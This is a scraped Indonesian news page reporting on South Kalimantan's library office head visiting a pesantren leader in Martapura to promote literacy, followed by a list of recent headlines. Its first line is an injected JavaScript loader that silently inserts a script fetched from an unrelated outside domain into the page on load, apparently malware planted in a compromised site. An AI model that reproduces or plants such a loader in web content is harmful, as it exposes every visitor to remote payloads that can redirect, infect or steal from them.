(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Dispersip Kalsel

Misi Literasi Kadispersip Sowan ke Pimpinan Umum Ponpes Darussalam Martapura


KANALKALIMANTAN.COM, MARTAPURA – Kepala Dinas Perpustakan dan Kearsipan (Dispersip) Provinsi Kalimantan Selatan Dra Hj Nurliani Dardie terus menggandeng berbagai kalangan guna mempertahankan Indeks Pembangunan Literasi (IPL) tertinggi se-Indonesia.

Tokoh ulama kota santri dan ulama Serambi Makkah Martapura, Kadispersip Kalsel sowan ke kediaman Pimpinan Umum Pondok Pesantren (Ponpes) Darussalam Martapura KH Hasanuddin Badruddin.

Sowan ke rumah Jalan Pintu AirMartapura guna meminta dukungan promosi minat baca dan literasi dari salah satu putera Al’alimul Allamah KH Badruddin, Tunggul Irang, Martapura ini.

Kadispersip Kalsel memang dikenal gemar merangkul banyak pihak, dari umara hingga alim ulama, tokoh masyarakat, lembaga, sampai satuan kerja perangkat daerah kabupaten/kota.

 

 

Baca juga: Malam Hari di Amuntai Expo 2022 Ramai Diserbu Pengunjung

“Saya pribadi tentu meminta doa dan dukungan kepada beliau. Apalagi beliau merupakan tokoh alim ulama yang jadi panutan dan tentu sangat berpengaruh, untuk dapat mengajak masyarakat dan santri membumikan dan meningkatkan minat baca,” ungkap Nurliani.

Predikat yang disandang Provinsi Kalsel sebagai provinsi dengan IPL tertinggi selama dua tahun berturut-turut, menjadi tantangan tersendiri untuk mempertahankan dan meningkatkan hal itu.

“Dispersip tidak akan mungkin bisa bekerja mempertahankan itu sendiri, karena hal itu perlu promosi yang lebih masif, terus menerus, dan harus didukung semua pihak dan kalangan,” beber mantan Kadispersip Kota Banjarbaru ini.

Pada tahun 2021, Provinsi Kalsel menorehkan nilai 58,13, meningkat dari tahun 2020 di angka 48,70, disusul Provinsi Maluku dengan indeks tertinggi ke-2 (35,75), dan ke-3 Gorontalo (22,53). (Kanalkalimantan.com/rls)

Reporter : rls
Editor : kk


Risa

Recent Posts

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

18 menit ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

31 menit ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

40 menit ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

50 menit ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

54 menit ago

Laga Terakhir Timnas Indonesia Berharap Juara Ketiga Piala Asia U-23

KANALKALIMANTAN.COM, BANJARBARU - Tim Nasional (Timnas) Indonesia U-23 dipastikan gagal melaju ke final Piala Asia… Read More

3 jam ago

This website uses cookies.